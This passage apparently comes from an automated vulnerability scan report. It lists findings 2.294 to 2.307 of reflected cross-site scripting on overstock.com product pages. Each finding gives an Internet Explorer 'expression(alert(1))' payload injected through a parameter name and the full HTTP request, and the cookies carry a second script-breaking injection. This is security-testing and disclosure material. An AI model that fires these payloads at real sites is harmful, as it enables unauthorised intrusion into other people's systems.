GET /Home-Garden/Microfiber-4-piece-Reversible-Comforter-Set/2594098/product.html?6f922"style%3d"x%3aexpression(alert(1))"23bb9d5f488=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.294. http://www.overstock.com/Home-Garden/Microfiber-Chocolate-Reversible-Chaise-Sectional-Sofa/4871753/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee01"style%3d"x%3aexpression(alert(1))"8749fc262f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ee01"style="x:expression(alert(1))"8749fc262f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Microfiber-Chocolate-Reversible-Chaise-Sectional-Sofa/4871753/product.html?1ee01"style%3d"x%3aexpression(alert(1))"8749fc262f3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.295. http://www.overstock.com/Home-Garden/Microfiber-Down-Alternative-Blanket/524253/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b603f"style%3d"x%3aexpression(alert(1))"61a9d7a22f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b603f"style="x:expression(alert(1))"61a9d7a22f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Microfiber-Down-Alternative-Blanket/524253/product.html?b603f"style%3d"x%3aexpression(alert(1))"61a9d7a22f3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.296. http://www.overstock.com/Home-Garden/Microfiber-Down-Alternative-Comforter-Set/4847669/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b09b3"style%3d"x%3aexpression(alert(1))"b59a287dc4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b09b3"style="x:expression(alert(1))"b59a287dc4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Microfiber-Down-Alternative-Comforter-Set/4847669/product.html?b09b3"style%3d"x%3aexpression(alert(1))"b59a287dc4e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.297. http://www.overstock.com/Home-Garden/Microfiber-Down-Blanket/450143/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4424d"style%3d"x%3aexpression(alert(1))"3782873608d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4424d"style="x:expression(alert(1))"3782873608d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Microfiber-Down-Blanket/450143/product.html?4424d"style%3d"x%3aexpression(alert(1))"3782873608d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.298. http://www.overstock.com/Home-Garden/Microfiber-Parson-Side-Chairs-Set-of-2/2216230/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3193e"style%3d"x%3aexpression(alert(1))"f916cb061d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3193e"style="x:expression(alert(1))"f916cb061d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Microfiber-Parson-Side-Chairs-Set-of-2/2216230/product.html?3193e"style%3d"x%3aexpression(alert(1))"f916cb061d8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.299. http://www.overstock.com/Home-Garden/Microfiber-Reversible-8-piece-Bed-in-a-Bag-with-Sheet-Set/3488989/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce170"style%3d"x%3aexpression(alert(1))"b6486dd95a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce170"style="x:expression(alert(1))"b6486dd95a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Microfiber-Reversible-8-piece-Bed-in-a-Bag-with-Sheet-Set/3488989/product.html?ce170"style%3d"x%3aexpression(alert(1))"b6486dd95a7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.300. http://www.overstock.com/Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad27a"style%3d"x%3aexpression(alert(1))"97020e23d5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad27a"style="x:expression(alert(1))"97020e23d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html?ad27a"style%3d"x%3aexpression(alert(1))"97020e23d5f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.301. http://www.overstock.com/Home-Garden/Montego-3-piece-Dining-Set/4409192/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc12"style%3d"x%3aexpression(alert(1))"72f79b56689 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4dc12"style="x:expression(alert(1))"72f79b56689 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Montego-3-piece-Dining-Set/4409192/product.html?4dc12"style%3d"x%3aexpression(alert(1))"72f79b56689=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.302. http://www.overstock.com/Home-Garden/Moroccan-Eucalyptus-3-piece-Quilt-Set/2022799/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62509"style%3d"x%3aexpression(alert(1))"dfbc2415216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62509"style="x:expression(alert(1))"dfbc2415216 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Moroccan-Eucalyptus-3-piece-Quilt-Set/2022799/product.html?62509"style%3d"x%3aexpression(alert(1))"dfbc2415216=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.303. http://www.overstock.com/Home-Garden/Nassau-Cast-Aluminum-Outdoor-Bistro-Furniture-Set/4787251/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5bd"style%3d"x%3aexpression(alert(1))"a144f18f712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a5bd"style="x:expression(alert(1))"a144f18f712 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Nassau-Cast-Aluminum-Outdoor-Bistro-Furniture-Set/4787251/product.html?9a5bd"style%3d"x%3aexpression(alert(1))"a144f18f712=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.304. http://www.overstock.com/Home-Garden/Natalia-Single-Bathroom-Vanity/3274952/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95275"style%3d"x%3aexpression(alert(1))"8ce8010ee2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95275"style="x:expression(alert(1))"8ce8010ee2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Natalia-Single-Bathroom-Vanity/3274952/product.html?95275"style%3d"x%3aexpression(alert(1))"8ce8010ee2b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.305. http://www.overstock.com/Home-Garden/Nine-Stars-Auto-open-Motion-Sensor-Infrared-Trash-Can-Combo-Pack/4226845/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7c5"style%3d"x%3aexpression(alert(1))"1239748eb9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b7c5"style="x:expression(alert(1))"1239748eb9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Nine-Stars-Auto-open-Motion-Sensor-Infrared-Trash-Can-Combo-Pack/4226845/product.html?1b7c5"style%3d"x%3aexpression(alert(1))"1239748eb9c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.306. http://www.overstock.com/Home-Garden/North-Canyon-Parsons-Dining-Chair-Set-of-2/3937732/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c487"style%3d"x%3aexpression(alert(1))"f96dd61031e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c487"style="x:expression(alert(1))"f96dd61031e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/North-Canyon-Parsons-Dining-Chair-Set-of-2/3937732/product.html?5c487"style%3d"x%3aexpression(alert(1))"f96dd61031e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.307. http://www.overstock.com/Home-Garden/North-Home-400-Thread-Count-Cotton-Sateen-Sheet-Set/4768014/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60142"style%3d"x%3aexpression(alert(1))"1bed08d2ae3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60142"style="x:expression(alert(1))"1bed08d2ae3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
